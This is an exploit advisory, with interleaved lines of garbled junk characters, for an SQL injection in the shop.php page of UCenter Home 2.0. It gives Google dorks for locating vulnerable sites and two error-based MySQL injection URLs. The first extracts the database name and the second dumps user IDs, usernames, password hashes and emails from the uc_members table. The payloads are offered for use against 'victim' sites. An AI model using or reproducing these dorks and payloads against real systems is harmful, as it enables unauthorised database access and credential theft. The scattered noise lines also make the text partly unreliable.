5 Y' W! z: m2 g! t
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
. U o& \, ~0 _" l4 w5 I) X
( M$ e: p( G3 B7 {& A3 R% }6 _$ _: l
% b+ |' G8 Y0 h! o% A
" X0 S: d# d" ]$ {# D*/ Author : KnocKout
2 S7 W) I) }! A, _0 L
- G. v6 h# `" N0 J' ]# ~ \*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
9 u' g4 C! K. C/ e7 s4 G- B% e: K2 p6 F8 g8 Z3 ?
*/ Contact: knockoutr@msn.com
+ c! \& K9 D2 N/ n0 P1 I' Y, B) V% n4 r
*/ Cyber-Warrior.org/CWKnocKout + v! C5 u7 A. n6 o7 _5 q! |
; d# R% j9 u' r* ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 R% h: e O- }5 T3 v9 {3 o. K. y; S$ y( i
Script : UCenter Home
2 R9 w, F( T- n7 k- D
( v* H3 A* O; o' G- Q( uVersion : 2.0 B8 x5 |) ?! i1 Z
4 [: ^# E7 Z ?5 _3 ~4 b- wScript HomePage : http://u.discuz.net/
8 y# W$ K$ P S& @
( U8 t% w; Y3 o6 X2 x__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
6 w2 E% Y; o1 B0 e d
+ I, Q5 n) k# `/ }3 ^/ NDork : Powered by UCenter inurl:shop.php?ac=view 5 Y6 J+ _7 \" F
9 U: `$ I# l8 q/ h3 b1 f
Dork 2 : inurl:shop.php?ac=view&shopid=
9 r) @" w- m4 b g. L$ t+ [
; G, p* T) i5 \__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 n& M/ ^: X3 t' i; C* s# V7 c9 y. y
Vuln file : Shop.php 3 I% Z0 L g& ?* W3 r5 h1 w
; _& y( ?. @5 j2 h
value's : (?)ac=view&shopid= 5 k. \+ G5 R0 j w
6 X" r- A8 O7 A1 Y7 {
Vulnerable Style : SQL Injection (MySQL Error Based)
, Q$ c/ R$ M6 O/ z3 T- s
4 N0 v+ `" H J+ A7 LNeed Metarials : Hex Conversion
) k% q* t! p7 `0 t) P' j+ }6 p( \7 W& b2 a: w% _; u; ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
j' U: H. Q, U# O: v- o( t7 J& h2 C' D# @) K
Your Need victim Database name. + O. `. w: A# u* a2 m8 v
' R' |0 V& x5 l5 `! Yfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 & H2 l/ n" A& Q2 F1 D3 T5 `% y
% n% b4 f2 ?8 \& i* K1 }+ y6 s
.. 8 Q( b9 G; u3 ~: l/ g- Q; z9 {) `, }
C, s/ n: M9 z0 k0 S/ m" l
DB : Okey.
7 ` {' T, y6 U: U7 m5 O" n4 F
2 y) g3 M+ R7 E6 `) A& p( B/ Byour edit DB `[TARGET DB NAME]` 2 r' ?% e5 n7 C# E
) [. P: _; w8 x: k2 z% V
Example : 'hiwir1_ucenter'
2 S- v5 M# ~" x$ B2 M0 }# G+ w
2 b$ X- ^* x5 e% k) d4 I5 REdit : Okey.
0 | Z/ ?2 g" L* P$ D+ Z) M T+ ~3 ^1 k9 B
Your use Hex conversion. And edit Your SQL Injection Exploit..
$ J+ P( t" o ?0 K) o- v a8 ]7 j! s
6 }" b& X( `# r2 J g; B/ f1 a- m ) _; J' W, y) ?# t; @# K- T
, E- i; u6 l2 W8 k' m2 [- W( lExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- c2 s9 D7 x1 `5 U ^" y8 q4 w |